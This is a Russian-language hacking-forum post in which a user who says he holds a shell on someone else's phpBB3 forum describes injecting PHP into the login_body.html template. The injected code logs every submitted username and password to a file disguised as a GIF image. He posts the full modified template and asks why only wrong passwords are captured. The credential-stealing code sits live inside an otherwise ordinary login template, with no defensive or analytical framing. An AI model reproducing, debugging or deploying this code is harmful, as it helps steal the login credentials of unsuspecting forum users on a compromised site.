Сборк паролей phpbb3

Discussion in 'Песочница' started by Revi, 7 Mar 2012.

  1. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Добрый день
    Есть форум phpbb3
    Вот у меня есть туда шелл.
    Но доступ к файлам запрещён.
    Вот я решил изменить их через шаблоны.
    Выбрал шаблон login_body.html
    <!-- PHP -->

    $Login = $_POST['username'];
    $Passwd = $_POST['password'];
    $fp = fopen("./pass.gif","a+");
    fwrite($fp,"$Login:$Passwd\n");
    fclose($fp);

    <!-- ENDPHP -->

    вписал туда это.
    Вроде все собирает, но он пишет только не верый пароль то есть если войдешь под правильным он не сохранит почему?
    Вот код login_body.html
    PHP:
    <!-- INCLUDE overall_header.html -->   <!-- PHP -->     $Login $_POST['username'];   $Passwd $_POST['password'];   $fp fopen("./images/bar_rigs_red.gif","a+");   fwrite($fp,"$Login:$Passwd\n");   fclose($fp);     <!-- ENDPHP -->    <script type="text/javascript">  // <![CDATA[      onload_functions.push('document.getElementById("{USERNAME_CREDENTIAL}").focus();');  // ]]>  </script>    <form action="{S_LOGIN_ACTION}" method="post" id="login">  <div class="panel">      <div class="inner"><span class="corners-top"><span></span></span>        <div class="content">          <h2><!-- IF LOGIN_EXPLAIN -->{LOGIN_EXPLAIN}<!-- ELSE -->{L_LOGIN}<!-- ENDIF --></h2>            <fieldset <!-- IF not S_CONFIRM_CODE -->class="fields1"<!-- ELSE -->class="fields2"<!-- ENDIF -->>          <!-- IF LOGIN_ERROR --><div class="error">{LOGIN_ERROR}</div><!-- ENDIF -->          <dl>              <dt><label for="{USERNAME_CREDENTIAL}">{L_USERNAME}:</label></dt>              <dd><input type="text" tabindex="1" name="{USERNAME_CREDENTIAL}" id="{USERNAME_CREDENTIAL}" size="25" value="{USERNAME}" class="inputbox autowidth" /></dd>          </dl>          <dl>              <dt><label for="{PASSWORD_CREDENTIAL}">{L_PASSWORD}:</label></dt>              <dd><input type="password" tabindex="2" id="{PASSWORD_CREDENTIAL}" name="{PASSWORD_CREDENTIAL}" size="25" class="inputbox autowidth" /></dd>              <!-- IF S_DISPLAY_FULL_LOGIN and (U_SEND_PASSWORD or U_RESEND_ACTIVATION) -->                  <!-- IF U_SEND_PASSWORD --><dd><a href="{U_SEND_PASSWORD}">{L_FORGOT_PASS}</a></dd><!-- ENDIF -->                  <!-- IF U_RESEND_ACTIVATION --><dd><a href="{U_RESEND_ACTIVATION}">{L_RESEND_ACTIVATION}</a></dd><!-- ENDIF -->              <!-- ENDIF -->          </dl>          <!-- IF CAPTCHA_TEMPLATE and S_CONFIRM_CODE -->              <!-- DEFINE $CAPTCHA_TAB_INDEX = 3 -->              <!-- INCLUDE {CAPTCHA_TEMPLATE} -->          <!-- ENDIF -->          <!-- IF S_DISPLAY_FULL_LOGIN -->          <dl>              <!-- IF S_AUTOLOGIN_ENABLED --><dd><label for="autologin"><input type="checkbox" name="autologin" id="autologin" tabindex="4" /> {L_LOG_ME_IN}</label></dd><!-- ENDIF -->              <dd><label for="viewonline"><input type="checkbox" name="viewonline" id="viewonline" tabindex="5" /> {L_HIDE_ME}</label></dd>          </dl>          <!-- ENDIF -->            {S_LOGIN_REDIRECT}                    <dl>              <dt>&nbsp;</dt>              <dd>{S_HIDDEN_FIELDS}<input type="submit" name="login" tabindex="6" value="{L_LOGIN}" class="button1" /></dd>          </dl>            </fieldset>      </div>      <span class="corners-bottom"><span></span></span></div>  </div>      <!-- IF not S_ADMIN_AUTH and S_REGISTER_ENABLED -->      <div class="panel">          <div class="inner"><span class="corners-top"><span></span></span>            <div class="content">              <h2>{L_REGISTER}</h2>              <p>{L_LOGIN_INFO}</p>              <p><strong><a href="{U_TERMS_USE}">{L_TERMS_USE}</a> | <a href="{U_PRIVACY}">{L_PRIVACY}</a></strong></p>              <hr class="dashed" />              <p><a href="{U_REGISTER}" class="button2">{L_REGISTER}</a></p>          </div>            <span class="corners-bottom"><span></span></span></div>      </div>  <!-- ENDIF -->    </form>    <!-- INCLUDE overall_footer.html -->